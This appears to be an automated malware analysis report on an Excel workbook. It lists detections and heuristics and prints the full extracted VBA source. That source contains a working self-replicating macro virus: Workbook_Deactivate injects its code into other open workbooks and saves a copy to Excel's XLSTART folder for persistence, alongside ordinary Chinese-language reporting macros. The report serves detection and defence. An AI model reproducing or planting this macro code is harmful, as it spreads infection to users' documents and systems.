MALICIOUS
288
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1137.001 DLL Search Order Hijacking
This XLSX file contains VBA macros that exhibit self-replication behavior and attempt to establish persistence. The Workbook_Deactivate subroutine copies the VBA project to the Excel startup folder, specifically targeting 'Application.StartupPath + "\Book1."'. The Workbook_BeforeClose subroutine also saves a copy of the workbook to 'C:\TMP\'. ClamAV detections confirm this is a known malicious macro variant.
Heuristics 6
-
ClamAV: Xls.Malware.Emeka-10012113-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Emeka-10012113-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
w2.InsertLines 1, w1.Lines(1, w1.CountOfLines) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set xlApp = CreateObject("Excel.Application") -
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCEThe macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.Matched line in script
xlWB.SaveAs Filename:=Application.StartupPath + "\Book1.", FileFormat:=xlNormal, AddToMru:=False -
External workbook data link low OOXML_EXTERNAL_REL_DATALINKExternal workbook reference in xl/externalLinks/_rels/externalLink1.xml.rels: \Desktop\QBR\1-7\各店报表\2022年1QBR_V2_MC0032S昆明合达.xlsx
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10362 bytes |
SHA-256: 1f280b7c7a0bdac562101faf97ed8244fb9feab89b1a783410bdd9a3464186b0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'OOO
''Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
''If UCase(ThisWorkbook.Name) = "BOOK1" Then
''Application.Dialogs(xlDialogSaveAs).Show
'Cancel = True
''End If
''End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
Set w1 = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set w2 = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
If w2.Lines(1, 1) <> "'OOO" Then
w2.InsertLines 1, w1.Lines(1, w1.CountOfLines)
End If
If UCase(Dir(Application.StartupPath + "\book1.")) <> "BOOK1" Then
Set xlApp = CreateObject("Excel.Application")
Set xlWB = xlApp.Workbooks.Add
Set xlWS = xlWB.Sheets.Add
Set xlCM = xlWB.VBProject.VBComponents("ThisWorkbook").CodeModule
xlCM.InsertLines 1, w1.Lines(1, w1.CountOfLines)
xlWB.SaveAs Filename:=Application.StartupPath + "\Book1.", FileFormat:=xlNormal, AddToMru:=False
xlWB.Close
xlApp.Quit
End If
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
On Error Resume Next
TmpDir = "C:\TMP\"
If Trim(Dir(TmpDir)) = "" Then
MkDir TmpDir
End If
oldname = ThisWorkbook.Name
mFileName = "C:\TMP\" + oldname
ThisWorkbook.SaveCopyAs Filename:=mFileName
End Sub
Sub vtHideRow()
Application.Selection.EntireRow.Hidden = True
End Sub
Sub vtShowRow()
Application.Selection.EntireRow.Hidden = False
End Sub
Sub vtShowCol()
Application.Selection.EntireColumn.Hidden = False
End Sub
'Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
'Sheets("ES Cover").Select
'Sheets("Financials").Range("AY3").Value = "FALSE"
'MsgBox "The workbook will be saved in constant USD"
'End Sub
'Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
'Sheets("ES Cover").Select
'Sheets("Financials").Range("AY3").Value = "FALSE"
'MsgBox "The workbook will be saved in constant USD"
'End Sub
Function WorksheetExists(WSName As String, _
Optional WB As Workbook = Nothing) As Boolean
On Error Resume Next
WorksheetExists = CBool(Len(IIf(WB Is Nothing, _
ThisWorkbook, WB).Worksheets(WSName).Name))
End Function
Private Sub Workbook_NewSheet(ByVal Sh As Object)
Application.DisplayAlerts = False
Application.ScreenUpdating = False
If WorksheetExists("Drill") = True Then '判断有没有某个sheet页,比较快速的方法
Sheets("Drill").Delete
End If
ActiveSheet.Name = "Drill"
Columns("A:B").Delete
With ActiveSheet.UsedRange.Columns("I").Cells
.TextToColumns Destination:=.Cells(1), DataType:=xlFixedWidth, FieldInfo:=Array(0, xlYMDFormat)
.NumberFormat = "m/d/yyyy" 'change to any date-based number format you prefer the cells to display
End With
Columns("A:T").AutoFit
Columns("N:T").NumberFormat = "#,##0.00_ ;[Red]-#,##0.00 "
If Worksheets("Directions").Range("D1").Value <> "" Then
ActiveSheet.ListObjects(1).Range.AutoFilter Field:=ActiveSheet.ListObjects(1).ListColumns(Worksheets("Directions").Range("D1").Value).Index, Criteria1:="<>"
End If
Range("A1:T" & Range("A" & Rows.Count).End(xlUp).Row).Sort key1:="Dept", Order1:=xlAscending, key2:="Journal Date", Order2:=xlAscending, Header:=xlYes, key3:="Invoice Date", Order3:=xlAscending
ActiveSheet.PageSetup.PrintArea = ActiveCell.CurrentRegion.Address
With ActiveSheet.PageSetup
.Orientation = xlLandscape
.Zoom = False
.FitToPagesTall = 1
.FitToPagesWide = 1
End With
Range("A1").Select
Worksheets("Directions").Range("D1").ClearContents
Application.DisplayAlerts = True
Application.ScreenUpdating = True
End Sub
'Private Sub Workbook_SheetPivotTableUpdate(ByVal Sh As Object, ByVal Target As PivotTable)
'Dim answer As String
'Dim COUNT As Integer
'Range("C6").Select
'If Range("B2") = "General and Administrative" Then
' Range("A500").Select
' answer = InputBox("Please enter password", "Access Restricted!!")
' If answer <> "tyrone" Then
' Range("B2") = "Rooms"
' Range("C6").Select
' MsgBox ("Invalid Password!")
' End If
' answer = "0"
' Range("C6").Select
'End If
'End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "模块1"
Sub 数据通用提取()
Application.DisplayAlerts = False
Application.ScreenUpdating = False
Dim DQwj As Workbook, SJwj As Workbook
Dim BYmc As String, WJmc As String, GSmc As String
Dim WJsl As Integer, QShs As Integer
Dim BBrq As String
Dim FK As String
On Error GoTo line
Set DQwj = ThisWorkbook
BBrq = Range("B6")
BYmc = Range("B8")
WJsl = Range("B9")
QShs = Range("B10") - 1
For i = 1 To WJsl
WJmc = Cells(i + QShs, 3)
GSmc = Cells(i + QShs, 2)
Set SJwj = Application.Workbooks.Open(WJmc, UpdateLinks = 0) 'DQwj.Path
Sheets(BYmc).Activate
Cells.Select
Selection.Copy
DQwj.Activate
Sheets(GSmc).Activate
Range("A1").Select
Selection.PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks:=False, Transpose:=False
SJwj.Sheets(BYmc).Activate
Cells.Select
Selection.Copy
DQwj.Activate
Sheets(GSmc).Activate
Cells.Select
Selection.PasteSpecial Paste:=xlPasteFormats, Operation:=xlNone, SkipBlanks:=False, Transpose:=False
DQwj.Sheets("提取页面").Activate
Range("A1").Select
' Cells.Copy
' DQwj.Activate
' Sheets(GSmc).Activate
' Cells.Select
' ActiveSheet.Paste
' Range("A1").Select
SJwj.Close False
line1:
Sheets(1).Select
Next
Calculate
MsgBox "数据提取完毕,以下公司提取报错!" & Chr(13) & FK
Application.CutCopyMode = False
Application.ScreenUpdating = True
Application.DisplayAlerts = True
Exit Sub
line:
FK = FK & GSmc & Chr(13)
Err.Clear
Resume line1
End Sub
Sub 表页生成()
Application.DisplayAlerts = False
Application.ScreenUpdating = False
Dim WJmc As String
Dim WJsl As Integer, QShs As Integer
WJsl = Range("B9")
QShs = Range("B10")
For i = 1 To WJsl
Sheets(1).Select
WJmc = Cells(i + QShs - 1, 2)
Sheets.Add After:=ActiveSheet
Sheets(2).Name = WJmc
Next
Sheets(1).Select
Application.ScreenUpdating = True
Application.DisplayAlerts = True
End Sub
Sub 表页清空()
Application.DisplayAlerts = False
Dim i As Integer, j As Integer
Sheets(1).Select
j = Sheets.Count - 1
For i = 1 To j
Sheets(2).Delete
Next
End Sub
Attribute VB_Name = "模块2"
Sub 复制路径()
Range("B3").Value = Range("B2")
End Sub
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet9"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet10"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 43520 bytes |
SHA-256: 6b21494d2119a57f601987771c83d9e15704d0b3340dca128733615d1f8b9261 |
|||
|
Detection
ClamAV:
Xls.Malware.Emeka-10012113-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.